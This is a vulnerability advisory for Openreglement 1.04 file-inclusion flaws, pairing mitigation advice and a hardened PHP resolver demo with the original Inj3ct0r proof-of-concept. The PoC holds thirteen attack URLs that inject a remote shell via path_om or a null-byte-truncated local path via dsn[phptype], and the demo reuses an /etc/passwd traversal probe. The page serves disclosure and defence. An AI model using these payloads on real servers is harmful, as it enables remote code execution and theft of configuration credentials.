Vendor: Openreglement
Author: cr4wl3r
CVSS: 7.5 (HIGH)
Type: RFI/LFI
CWE: 22
Product Name: Openreglement
Affected Version From: 01.04
Affected Version To: 01.04
Patch Exists: NO
Platforms Tested: Unknown

Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability

Openreglement 1.04 (distributed as openmairie_reglement_1.04.zip) builds include paths from request data without validating it. Twelve scripts under obj/ (accompagnants.class.php, dossier.class.php, motif_cni.class.php, utilisateur.class.php, centre.class.php, droit.class.php, motif_retour.class.php, profil.class.php, collectivite.class.php, doc_identite.class.php, mention.class.php and titre_presente_enf.class.php) take the path_om parameter, and scr/soustab.php takes dsn[phptype]. A remote attacker who sets path_om to a URL gets that script fetched and executed on the server (remote file inclusion, which works only when PHP's allow_url_include is enabled). Supplying a local path to dsn[phptype], terminated with %00 as in the PoC, includes an arbitrary local file instead (local file inclusion); the trailing null byte cuts off whatever suffix the script appends, which works on PHP releases before 5.3.4. Either vector can disclose source and configuration files (database credentials included), and the RFI vector, or an LFI chained with a writable log or upload, gives remote code execution as the web server user.

Mitigation:

No vendor patch is listed. The fix is to stop deriving include paths from the request: path_om should be read from the application's configuration only, and dsn[phptype] should be mapped through an allowlist of known driver names before any file name is built from it. Canonicalise the resulting path with realpath() and check that it stays under the application directory; reject any value that carries a URL scheme, "..", or a null byte. Independently of the code fix, set allow_url_include=Off (and allow_url_fopen=Off where nothing else needs it) in php.ini so that an include bug cannot pull remote code, and run PHP 5.3.4 or later, which refuses null bytes in include paths and so closes the %00 truncation the LFI PoC relies on. Those two settings reduce the impact but do not remove the underlying bug.
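The following is an added example, not code from Openreglement or from the advisory. It reconstructs the include pattern that the PoC parameters imply (a request-controlled prefix and a request-controlled file name) and places a hardened version beside it. The function names, the obj/ layout, the driver allowlist and the temporary base directory are assumptions made for illustration; the real Openreglement source is not shown on this page.

```php
<?php
// Added example: not Openreglement's source and not part of the advisory. It
// reconstructs the include pattern the PoC parameters imply and puts a hardened
// version beside it. Function names, the obj/ layout, the driver allowlist and
// the temporary base directory are assumptions made for illustration.

// Assumed vulnerable shape: request data becomes part of an include path. The
// function only returns the string that would reach include(); nothing is
// actually included here, so the demo is safe to run.
//   path_om=http://shell4u.tk/x            -> remote script (RFI) if allow_url_include=On
//   dsn[phptype]=../../../../etc/passwd%00 -> suffix truncated on PHP < 5.3.4 (LFI)
function resolve_include_vulnerable(array $get): string
{
    $prefix  = $get['path_om'] ?? '.';
    $phptype = $get['dsn']['phptype'] ?? 'mysql';
    return $prefix . '/obj/' . $phptype . '.class.php';
}

// Hardened shape: the directory prefix comes from configuration, never from the
// request; the variable part is mapped through an allowlist of known names; the
// result is canonicalised and must stay under the application directory.
function resolve_include_hardened(array $get, string $base): string
{
    static $drivers = ['mysql' => 'mysql', 'pgsql' => 'pgsql']; // assumed driver names
    $phptype = $get['dsn']['phptype'] ?? 'mysql';
    // is_string() first: dsn[phptype][]=x would arrive as an array and break isset()
    if (!is_string($phptype) || !isset($drivers[$phptype])) {
        throw new InvalidArgumentException('dsn[phptype] is not an allowed driver');
    }
    $baseReal = realpath($base);
    $real     = realpath($base . '/obj/' . $drivers[$phptype] . '.class.php');
    if ($baseReal === false || $real === false
        || strncmp($real, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        throw new RuntimeException('include target missing or outside the application directory');
    }
    return $real;
}

// Self-test with constructed inputs: build a throwaway tree so realpath() can
// resolve, then push the advisory's two PoC shapes and one legitimate request
// through both resolvers.
$base = sys_get_temp_dir() . '/openreglement_demo_' . getmypid();
mkdir($base . '/obj', 0700, true);
file_put_contents($base . '/obj/mysql.class.php', "<?php // stub\n");

$probes = [
    'RFI PoC'    => ['path_om' => 'http://shell4u.tk/x'],
    'LFI PoC'    => ['dsn' => ['phptype' => "../../../../etc/passwd\0"]],
    'legitimate' => ['dsn' => ['phptype' => 'mysql']],
];
foreach ($probes as $label => $get) {
    // addcslashes() renders the embedded null byte as \000 so it is visible
    printf("%-10s vulnerable -> %s\n", $label, addcslashes(resolve_include_vulnerable($get), "\0"));
    try {
        printf("%-10s hardened   -> %s\n", $label, resolve_include_hardened($get, $base));
    } catch (Exception $e) {
        printf("%-10s hardened   -> rejected (%s)\n", $label, $e->getMessage());
    }
}

unlink($base . '/obj/mysql.class.php');
rmdir($base . '/obj');
rmdir($base);
```

Run it with `php demo.php` (PHP 7 or later). The vulnerable resolver happily returns `http://shell4u.tk/x/obj/mysql.class.php` for the RFI probe and a path with an embedded null byte for the LFI probe; the hardened resolver ignores path_om entirely, refuses the traversal value because it is not in the allowlist, and only ever returns a canonical path under the configured base directory. Keep allow_url_include=Off regardless: the allowlist is the fix, the php.ini setting is the safety net.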

Exploit-DB raw data:

================================================================
Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability
================================================================


[+] Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4273/openmairie_reglement_1.04.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, ggcc.web.id

[+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/obj/accompagnants.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/dossier.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/motif_cni.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/utilisateur.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/centre.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/droit.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/motif_retour.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/profil.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/collectivite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/doc_identite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/mention.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/titre_presente_enf.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]


# Inj3ct0r.com [2010-04-20]